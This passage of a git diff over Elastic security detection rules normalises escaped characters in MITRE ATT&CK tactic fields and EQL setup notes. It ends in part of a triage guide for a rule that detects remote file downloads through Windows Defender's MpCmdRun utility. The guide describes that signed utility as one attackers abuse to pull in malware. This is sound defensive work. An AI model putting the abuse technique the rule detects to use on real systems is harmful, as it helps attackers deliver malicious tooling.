+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/c4e9ed3e-55a2-4309-a012-bc3c78dad10a_1.json b/packages/security_detection_engine/kibana/security_rule/c4e9ed3e-55a2-4309-a012-bc3c78dad10a_1.json
index b53f23c2f45..387925031fc 100644
--- a/packages/security_detection_engine/kibana/security_rule/c4e9ed3e-55a2-4309-a012-bc3c78dad10a_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/c4e9ed3e-55a2-4309-a012-bc3c78dad10a_1.json
@@ -64,7 +64,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0007",
 "name": "Discovery",
diff --git a/packages/security_detection_engine/kibana/security_rule/c4e9ed3e-55a2-4309-a012-bc3c78dad10a_2.json b/packages/security_detection_engine/kibana/security_rule/c4e9ed3e-55a2-4309-a012-bc3c78dad10a_2.json
index ad8d87c85fa..41a207e669c 100644
--- a/packages/security_detection_engine/kibana/security_rule/c4e9ed3e-55a2-4309-a012-bc3c78dad10a_2.json
+++ b/packages/security_detection_engine/kibana/security_rule/c4e9ed3e-55a2-4309-a012-bc3c78dad10a_2.json
@@ -65,7 +65,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0007",
 "name": "Discovery",
diff --git a/packages/security_detection_engine/kibana/security_rule/c4e9ed3e-55a2-4309-a012-bc3c78dad10a_3.json b/packages/security_detection_engine/kibana/security_rule/c4e9ed3e-55a2-4309-a012-bc3c78dad10a_3.json
index 614144deaad..756ca167eaf 100644
--- a/packages/security_detection_engine/kibana/security_rule/c4e9ed3e-55a2-4309-a012-bc3c78dad10a_3.json
+++ b/packages/security_detection_engine/kibana/security_rule/c4e9ed3e-55a2-4309-a012-bc3c78dad10a_3.json
@@ -64,7 +64,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0007",
 "name": "Discovery",
diff --git a/packages/security_detection_engine/kibana/security_rule/c55badd3-3e61-4292-836f-56209dc8a601_1.json b/packages/security_detection_engine/kibana/security_rule/c55badd3-3e61-4292-836f-56209dc8a601_1.json
index 8e808a717f1..70c8925a793 100644
--- a/packages/security_detection_engine/kibana/security_rule/c55badd3-3e61-4292-836f-56209dc8a601_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/c55badd3-3e61-4292-836f-56209dc8a601_1.json
@@ -55,7 +55,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/c5677997-f75b-4cda-b830-a75920514096_1.json b/packages/security_detection_engine/kibana/security_rule/c5677997-f75b-4cda-b830-a75920514096_1.json
index c9156346927..d886b267e4e 100644
--- a/packages/security_detection_engine/kibana/security_rule/c5677997-f75b-4cda-b830-a75920514096_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/c5677997-f75b-4cda-b830-a75920514096_1.json
@@ -52,7 +52,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
@@ -67,7 +67,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
@@ -89,7 +89,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/c57f8579-e2a5-4804-847f-f2732edc5156_103.json b/packages/security_detection_engine/kibana/security_rule/c57f8579-e2a5-4804-847f-f2732edc5156_103.json
index 6ddcae0a26b..125100a4f95 100644
--- a/packages/security_detection_engine/kibana/security_rule/c57f8579-e2a5-4804-847f-f2732edc5156_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/c57f8579-e2a5-4804-847f-f2732edc5156_103.json
@@ -74,7 +74,7 @@
 ],
 "risk_score": 73,
 "rule_id": "c57f8579-e2a5-4804-847f-f2732edc5156",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Elastic",
@@ -86,7 +86,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0008",
 "name": "Lateral Movement",
diff --git a/packages/security_detection_engine/kibana/security_rule/c57f8579-e2a5-4804-847f-f2732edc5156_104.json b/packages/security_detection_engine/kibana/security_rule/c57f8579-e2a5-4804-847f-f2732edc5156_104.json
index a5c52f6a351..5e28a92b496 100644
--- a/packages/security_detection_engine/kibana/security_rule/c57f8579-e2a5-4804-847f-f2732edc5156_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/c57f8579-e2a5-4804-847f-f2732edc5156_104.json
@@ -74,7 +74,7 @@
 ],
 "risk_score": 73,
 "rule_id": "c57f8579-e2a5-4804-847f-f2732edc5156",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -85,7 +85,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0008",
 "name": "Lateral Movement",
diff --git a/packages/security_detection_engine/kibana/security_rule/c57f8579-e2a5-4804-847f-f2732edc5156_105.json b/packages/security_detection_engine/kibana/security_rule/c57f8579-e2a5-4804-847f-f2732edc5156_105.json
index 12da98219f7..4bed6b4e0c4 100644
--- a/packages/security_detection_engine/kibana/security_rule/c57f8579-e2a5-4804-847f-f2732edc5156_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/c57f8579-e2a5-4804-847f-f2732edc5156_105.json
@@ -74,7 +74,7 @@
 ],
 "risk_score": 73,
 "rule_id": "c57f8579-e2a5-4804-847f-f2732edc5156",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -86,7 +86,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0008",
 "name": "Lateral Movement",
diff --git a/packages/security_detection_engine/kibana/security_rule/c57f8579-e2a5-4804-847f-f2732edc5156_106.json b/packages/security_detection_engine/kibana/security_rule/c57f8579-e2a5-4804-847f-f2732edc5156_106.json
index 09db7b40d03..e4146a1f439 100644
--- a/packages/security_detection_engine/kibana/security_rule/c57f8579-e2a5-4804-847f-f2732edc5156_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/c57f8579-e2a5-4804-847f-f2732edc5156_106.json
@@ -74,7 +74,7 @@
 ],
 "risk_score": 73,
 "rule_id": "c57f8579-e2a5-4804-847f-f2732edc5156",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -86,7 +86,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0008",
 "name": "Lateral Movement",
diff --git a/packages/security_detection_engine/kibana/security_rule/c57f8579-e2a5-4804-847f-f2732edc5156_107.json b/packages/security_detection_engine/kibana/security_rule/c57f8579-e2a5-4804-847f-f2732edc5156_107.json
index d5efc084e83..7c472e79d09 100644
--- a/packages/security_detection_engine/kibana/security_rule/c57f8579-e2a5-4804-847f-f2732edc5156_107.json
+++ b/packages/security_detection_engine/kibana/security_rule/c57f8579-e2a5-4804-847f-f2732edc5156_107.json
@@ -73,7 +73,7 @@
 ],
 "risk_score": 73,
 "rule_id": "c57f8579-e2a5-4804-847f-f2732edc5156",
- "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
+ "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -85,7 +85,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0008",
 "name": "Lateral Movement",
diff --git a/packages/security_detection_engine/kibana/security_rule/c58c3081-2e1d-4497-8491-e73a45d1a6d6_103.json b/packages/security_detection_engine/kibana/security_rule/c58c3081-2e1d-4497-8491-e73a45d1a6d6_103.json
index 35b52dcf021..149f1a698bd 100644
--- a/packages/security_detection_engine/kibana/security_rule/c58c3081-2e1d-4497-8491-e73a45d1a6d6_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/c58c3081-2e1d-4497-8491-e73a45d1a6d6_103.json
@@ -59,7 +59,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/c58c3081-2e1d-4497-8491-e73a45d1a6d6_104.json b/packages/security_detection_engine/kibana/security_rule/c58c3081-2e1d-4497-8491-e73a45d1a6d6_104.json
index 5a0d47985d4..ca6bbcca1ab 100644
--- a/packages/security_detection_engine/kibana/security_rule/c58c3081-2e1d-4497-8491-e73a45d1a6d6_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/c58c3081-2e1d-4497-8491-e73a45d1a6d6_104.json
@@ -56,7 +56,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/c5c9f591-d111-4cf8-baec-c26a39bc31ef_103.json b/packages/security_detection_engine/kibana/security_rule/c5c9f591-d111-4cf8-baec-c26a39bc31ef_103.json
index 3beab5b3bd0..d6d3f2cf9cb 100644
--- a/packages/security_detection_engine/kibana/security_rule/c5c9f591-d111-4cf8-baec-c26a39bc31ef_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/c5c9f591-d111-4cf8-baec-c26a39bc31ef_103.json
@@ -84,7 +84,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/c5c9f591-d111-4cf8-baec-c26a39bc31ef_104.json b/packages/security_detection_engine/kibana/security_rule/c5c9f591-d111-4cf8-baec-c26a39bc31ef_104.json
index d445d4d89a8..bc3d89f5a0c 100644
--- a/packages/security_detection_engine/kibana/security_rule/c5c9f591-d111-4cf8-baec-c26a39bc31ef_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/c5c9f591-d111-4cf8-baec-c26a39bc31ef_104.json
@@ -83,7 +83,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/c5c9f591-d111-4cf8-baec-c26a39bc31ef_105.json b/packages/security_detection_engine/kibana/security_rule/c5c9f591-d111-4cf8-baec-c26a39bc31ef_105.json
index c45b8651f98..63fd56756ea 100644
--- a/packages/security_detection_engine/kibana/security_rule/c5c9f591-d111-4cf8-baec-c26a39bc31ef_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/c5c9f591-d111-4cf8-baec-c26a39bc31ef_105.json
@@ -84,7 +84,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
@@ -106,7 +106,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/c5c9f591-d111-4cf8-baec-c26a39bc31ef_106.json b/packages/security_detection_engine/kibana/security_rule/c5c9f591-d111-4cf8-baec-c26a39bc31ef_106.json
index 88e8bd1eca9..301939f6265 100644
--- a/packages/security_detection_engine/kibana/security_rule/c5c9f591-d111-4cf8-baec-c26a39bc31ef_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/c5c9f591-d111-4cf8-baec-c26a39bc31ef_106.json
@@ -83,7 +83,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
@@ -105,7 +105,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/c5ce48a6-7f57-4ee8-9313-3d0024caee10_103.json b/packages/security_detection_engine/kibana/security_rule/c5ce48a6-7f57-4ee8-9313-3d0024caee10_103.json
index be1ecd49c50..da8f3a27762 100644
--- a/packages/security_detection_engine/kibana/security_rule/c5ce48a6-7f57-4ee8-9313-3d0024caee10_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/c5ce48a6-7f57-4ee8-9313-3d0024caee10_103.json
@@ -68,7 +68,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/c5ce48a6-7f57-4ee8-9313-3d0024caee10_104.json b/packages/security_detection_engine/kibana/security_rule/c5ce48a6-7f57-4ee8-9313-3d0024caee10_104.json
index 9624e5eb307..273f0d3e20a 100644
--- a/packages/security_detection_engine/kibana/security_rule/c5ce48a6-7f57-4ee8-9313-3d0024caee10_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/c5ce48a6-7f57-4ee8-9313-3d0024caee10_104.json
@@ -67,7 +67,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/c5ce48a6-7f57-4ee8-9313-3d0024caee10_105.json b/packages/security_detection_engine/kibana/security_rule/c5ce48a6-7f57-4ee8-9313-3d0024caee10_105.json
index 76b9f8a4e42..8f89487bf08 100644
--- a/packages/security_detection_engine/kibana/security_rule/c5ce48a6-7f57-4ee8-9313-3d0024caee10_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/c5ce48a6-7f57-4ee8-9313-3d0024caee10_105.json
@@ -68,7 +68,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/c5dc3223-13a2-44a2-946c-e9dc0aa0449c_104.json b/packages/security_detection_engine/kibana/security_rule/c5dc3223-13a2-44a2-946c-e9dc0aa0449c_104.json
index a7dc98ffc18..fdbf6b10595 100644
--- a/packages/security_detection_engine/kibana/security_rule/c5dc3223-13a2-44a2-946c-e9dc0aa0449c_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/c5dc3223-13a2-44a2-946c-e9dc0aa0449c_104.json
@@ -56,7 +56,7 @@
 ],
 "risk_score": 73,
 "rule_id": "c5dc3223-13a2-44a2-946c-e9dc0aa0449c",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Elastic",
@@ -69,7 +69,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
@@ -91,7 +91,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/c5dc3223-13a2-44a2-946c-e9dc0aa0449c_105.json b/packages/security_detection_engine/kibana/security_rule/c5dc3223-13a2-44a2-946c-e9dc0aa0449c_105.json
index 20c35ae6dcb..ef7d6f69e2d 100644
--- a/packages/security_detection_engine/kibana/security_rule/c5dc3223-13a2-44a2-946c-e9dc0aa0449c_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/c5dc3223-13a2-44a2-946c-e9dc0aa0449c_105.json
@@ -56,7 +56,7 @@
 ],
 "risk_score": 73,
 "rule_id": "c5dc3223-13a2-44a2-946c-e9dc0aa0449c",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -68,7 +68,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
@@ -90,7 +90,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/c5dc3223-13a2-44a2-946c-e9dc0aa0449c_106.json b/packages/security_detection_engine/kibana/security_rule/c5dc3223-13a2-44a2-946c-e9dc0aa0449c_106.json
index 5260477a845..8a819445a63 100644
--- a/packages/security_detection_engine/kibana/security_rule/c5dc3223-13a2-44a2-946c-e9dc0aa0449c_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/c5dc3223-13a2-44a2-946c-e9dc0aa0449c_106.json
@@ -56,7 +56,7 @@
 ],
 "risk_score": 73,
 "rule_id": "c5dc3223-13a2-44a2-946c-e9dc0aa0449c",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -69,7 +69,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
@@ -91,7 +91,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/c5dc3223-13a2-44a2-946c-e9dc0aa0449c_107.json b/packages/security_detection_engine/kibana/security_rule/c5dc3223-13a2-44a2-946c-e9dc0aa0449c_107.json
index 807459c6611..acaa8664c70 100644
--- a/packages/security_detection_engine/kibana/security_rule/c5dc3223-13a2-44a2-946c-e9dc0aa0449c_107.json
+++ b/packages/security_detection_engine/kibana/security_rule/c5dc3223-13a2-44a2-946c-e9dc0aa0449c_107.json
@@ -56,7 +56,7 @@
 ],
 "risk_score": 73,
 "rule_id": "c5dc3223-13a2-44a2-946c-e9dc0aa0449c",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -70,7 +70,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
@@ -92,7 +92,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/c5dc3223-13a2-44a2-946c-e9dc0aa0449c_108.json b/packages/security_detection_engine/kibana/security_rule/c5dc3223-13a2-44a2-946c-e9dc0aa0449c_108.json
index 0af0dfdb5fe..b1669bfeb40 100644
--- a/packages/security_detection_engine/kibana/security_rule/c5dc3223-13a2-44a2-946c-e9dc0aa0449c_108.json
+++ b/packages/security_detection_engine/kibana/security_rule/c5dc3223-13a2-44a2-946c-e9dc0aa0449c_108.json
@@ -56,7 +56,7 @@
 ],
 "risk_score": 73,
 "rule_id": "c5dc3223-13a2-44a2-946c-e9dc0aa0449c",
- "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
+ "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -70,7 +70,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
@@ -92,7 +92,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/c5f81243-56e0-47f9-b5bb-55a5ed89ba57_101.json b/packages/security_detection_engine/kibana/security_rule/c5f81243-56e0-47f9-b5bb-55a5ed89ba57_101.json
index 7d3d40b2cf7..b304957cac2 100644
--- a/packages/security_detection_engine/kibana/security_rule/c5f81243-56e0-47f9-b5bb-55a5ed89ba57_101.json
+++ b/packages/security_detection_engine/kibana/security_rule/c5f81243-56e0-47f9-b5bb-55a5ed89ba57_101.json
@@ -58,7 +58,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
@@ -73,7 +73,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0001",
 "name": "Initial Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/c5f81243-56e0-47f9-b5bb-55a5ed89ba57_102.json b/packages/security_detection_engine/kibana/security_rule/c5f81243-56e0-47f9-b5bb-55a5ed89ba57_102.json
index 229300fa40f..af699000767 100644
--- a/packages/security_detection_engine/kibana/security_rule/c5f81243-56e0-47f9-b5bb-55a5ed89ba57_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/c5f81243-56e0-47f9-b5bb-55a5ed89ba57_102.json
@@ -56,7 +56,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
@@ -71,7 +71,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0001",
 "name": "Initial Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/c6453e73-90eb-4fe7-a98c-cde7bbfc504a_104.json b/packages/security_detection_engine/kibana/security_rule/c6453e73-90eb-4fe7-a98c-cde7bbfc504a_104.json
index 9d62d3cc01b..7b1aa363bb7 100644
--- a/packages/security_detection_engine/kibana/security_rule/c6453e73-90eb-4fe7-a98c-cde7bbfc504a_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/c6453e73-90eb-4fe7-a98c-cde7bbfc504a_104.json
@@ -14,7 +14,7 @@
 "language": "eql",
 "license": "Elastic License v2",
 "name": "Remote File Download via MpCmdRun",
- "note": "## Triage and analysis\n\n### Investigating Remote File Download via MpCmdRun\n\nAttackers commonly transfer tooling or malware from external systems into a compromised environment using the command and control channel. However, they can also abuse signed utilities to drop these files.\n\nThe `MpCmdRun.exe` is a command-line tool part of Windows Defender and is used to manage various Microsoft Windows Defender Antivirus settings and perform certain tasks. It can also be abused by attackers to download remote files, including malware and offensive tooling. This rule looks for the patterns used to perform downloads using the utility.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check the reputation of the domain or IP address used to host the downloaded file.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. 
